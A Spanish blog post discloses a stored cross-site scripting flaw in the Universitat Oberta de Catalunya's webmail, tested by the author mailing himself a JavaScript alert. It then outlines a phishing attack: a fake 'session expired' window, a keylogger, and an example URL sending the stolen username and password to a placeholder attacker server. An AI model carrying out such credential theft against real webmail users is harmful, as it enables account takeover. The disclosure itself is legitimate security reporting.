jueves, 25 de noviembre de 2010

Error de seguridad en el correo de la UOC

El sistema de comunicación de la Universitat Oberta de Catalunya está basado en su correo interno. Casi todo se hace a través del envío de correos electrónicos: entrega de prácticas, comentarios en los foros y tablones, mensajes a compañeros y profesores, etc.

Acordándome del reciente caso del chico de Sevilla que descubrió una vulnerabilidad con la famosa red social Twitter, decidí "probar suerte" con el correo de la UOC.

Era sencillo, sólo tenía que mandarme un correo con un simple alert de javascript a mí mismo y comprobar el resultado:



El correo se manda sin ningún problema como es de esperar. Unos instantes después aparece en mi buzón el aviso de que tengo un nuevo email sin leer:


Procedemos a abrir el mensaje y ¡sorpresa!:



El resultado salta a la vista. A través del correo de la UOC podemos inyectar javascript para hacer todo lo que este lenguaje nos permite. ¿Qué se puede hacer? casi de todo. Modificar los estilos de la página web, cerrarla, redireccionarla, leer la cookie, insertar nuevos campos, sacar ventanitas.

Un ejemplo podría ser abrir una nueva ventana informando al usuario que la sesión ha caducado y que debe de introducir de nuevo sus datos. Con un keylogger registrar nombre de usuario y contraseña y mandarlos por parámetro con un simple windows.location.href tal que así: 
http://nuestro_servidor_malvado/recoge_datos.php?user=usuario&password=123456
Usando AJAX se podría disimular toda esta parafernalia, siendo casi totalmente transparente para un usuario no familiarizado con las ténicas de phishing.

No hay comentarios: